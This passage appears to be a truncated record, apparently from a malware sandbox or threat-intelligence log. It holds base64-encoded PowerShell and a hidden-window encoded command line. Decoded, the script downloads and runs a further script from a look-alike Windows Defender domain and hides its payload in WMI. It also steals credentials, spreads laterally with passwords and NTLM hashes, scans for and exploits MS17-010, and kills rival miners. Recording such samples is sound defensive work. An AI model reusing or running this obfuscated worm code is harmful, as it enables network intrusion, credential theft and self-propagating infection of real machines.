HUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAu